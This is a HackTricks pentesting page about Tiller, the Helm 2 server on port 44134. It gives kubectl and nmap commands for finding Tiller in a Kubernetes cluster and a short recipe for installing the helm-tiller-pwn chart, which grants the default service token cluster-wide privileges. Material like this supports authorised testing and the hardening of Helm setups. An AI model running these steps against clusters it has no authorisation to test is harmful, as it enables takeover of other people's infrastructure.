44134 - Pentesting Tiller (Helm)

​☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥​
Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
Discover The PEASS Family, our collection of exclusive NFTs​
Get the official PEASS & HackTricks swag​
Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦​@carlospolopm.
Share your hacking tricks by submitting PRs to the hacktricks repo and hacktricks-cloud repo.
Basic Information
Helm is the package manager for Kubernetes. It allows to package YAML files and distribute them in public and private repositories. These packages are called Helm Charts. Tiller is the service running by default in the port 44134 offering the service.
Default port: 44134
PORT      STATE SERVICE VERSION
44134/tcp open  unknown
Enumeration
If you can enumerate pods and/or services of different namespaces enumerate them and search for the ones with "tiller" in their name:
kubectl get pods | grep -i "tiller"
kubectl get services | grep -i "tiller"
kubectl get pods -n kube-system | grep -i "tiller"
kubectl get services -n kube-system | grep -i "tiller"
kubectl get pods -n <namespace> | grep -i "tiller"
kubectl get services -n <namespace> | grep -i "tiller"
Examples:
kubectl get pods -n kube-system
NAME                                       READY   STATUS             RESTARTS   AGE
kube-scheduler-controlplane                1/1     Running            0          35m
tiller-deploy-56b574c76d-l265z             1/1     Running            0          35m
​
kubectl get services -n kube-system
NAME            TYPE        CLUSTER-IP     EXTERNAL-IP   PORT(S)                  AGE
kube-dns        ClusterIP   10.96.0.10     <none>        53/UDP,53/TCP,9153/TCP   35m
tiller-deploy   ClusterIP   10.98.57.159   <none>        44134/TCP                35m
You could also try to find this service running checking the port 44134:
sudo nmap -sS -p 44134 <IP>
Once you have discovered it you can communicate with it downloading the client helm application. You can use tools like homebrew, or look at the official releases page. For more details, or for other options, see the installation guide.
Then, you can enumerate the service:
helm --host tiller-deploy.kube-system:44134 version
Privilege Escalation
By default Helm2 was installed in the namespace kube-system with high privileges, so if you find the service and has access to it, this could allow you to escalate privileges.
All you need to do is to install a package like this one: https://github.com/Ruil1n/helm-tiller-pwn that will give the default service token access to everything in the whole cluster.
git clone https://github.com/Ruil1n/helm-tiller-pwn
helm --host tiller-deploy.kube-system:44134 install --name pwnchart helm-tiller-pwn
/pwnchart
In http://rui0.cn/archives/1573 you have the explanation of the attack, but basically, if you read the files clusterrole.yaml and clusterrolebinding.yaml inside helm-tiller-pwn/pwnchart/templates/ you can see how all the privileges are being given to the default token.
​☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥​
Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
Discover The PEASS Family, our collection of exclusive NFTs​
Get the official PEASS & HackTricks swag​
Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦​@carlospolopm.
Share your hacking tricks by submitting PRs to the hacktricks repo and hacktricks-cloud repo.
Last modified 1mo ago